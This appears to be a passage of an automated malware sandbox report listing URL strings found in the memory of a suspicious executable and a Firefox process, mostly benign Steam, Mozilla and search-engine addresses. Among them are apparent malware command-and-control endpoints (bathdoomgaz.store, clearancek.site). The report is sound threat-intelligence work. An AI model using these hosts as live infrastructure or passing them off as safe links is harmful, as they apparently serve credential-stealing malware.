Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C96961E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2236916533.000001C96946F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C96967B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2236916533.000001C96941D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2129414948.000001C9633E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963424000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96349E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C96965D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F251000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2126645860.000001C962BF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2156687679.000001C967303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/moz-in
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96349E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/UrlbarProviderQuick
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001D.00000002.2303891585.000001C96F739000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 0000001D.00000002.2300171636.000001C96F54B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984164128.000001C966D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985500280.000001C966F60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984524321.000001C966F21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985862608.000001C966F7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985118386.000001C966F40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.1432143495.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431960048.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2000505983.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999766208.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2144220840.000001C964800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2167562247.000001C967798000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2236916533.000001C96944B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2192132128.000001C96875C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2277444887.000001C96F03C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001D.00000002.2126645860.000001C962BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C9679BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E09000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2229257788.000001C968F51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F286000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 0000001D.00000002.2122168164.000001C957211000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.s
Source: 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bathdoomgaz.store:443/api?
Source: file.exe, 00000000.00000003.1460412273.000000000598E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962AAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: file.exe, 00000000.00000003.1460412273.000000000598E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962AAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: firefox.exe, 0000001D.00000002.2277444887.000001C96F0B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001D.00000002.2277444887.000001C96F0B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001D.00000002.2277444887.000001C96F0B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001D.00000002.2277444887.000001C96F0B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/p
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.1432143495.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431960048.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2000505983.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999766208.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1432143495.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431960048.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2000505983.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999766208.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1432143495.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431960048.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2000505983.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999766208.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clearancek.site:443/apii
Source: file.exe, 00000000.00000003.1474200360.00000000011F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.c
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1493028157.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloF
Source: file.exe, 00000000.00000003.1459148229.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1477555129.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1446807409.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431421560.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1474200360.00000000011F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1493028157.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1493028157.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steams
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1493028157.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public.
Source: file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/communitp
Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815032604.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812396686.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&amp;l=e
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&amp;
Source: 8138ba21a1.exe, 00000012.00000003.2180590726.0000000001175000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/prof(s
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815032604.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812396686.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815032604.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812396686.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815032604.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812396686.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=W9BX
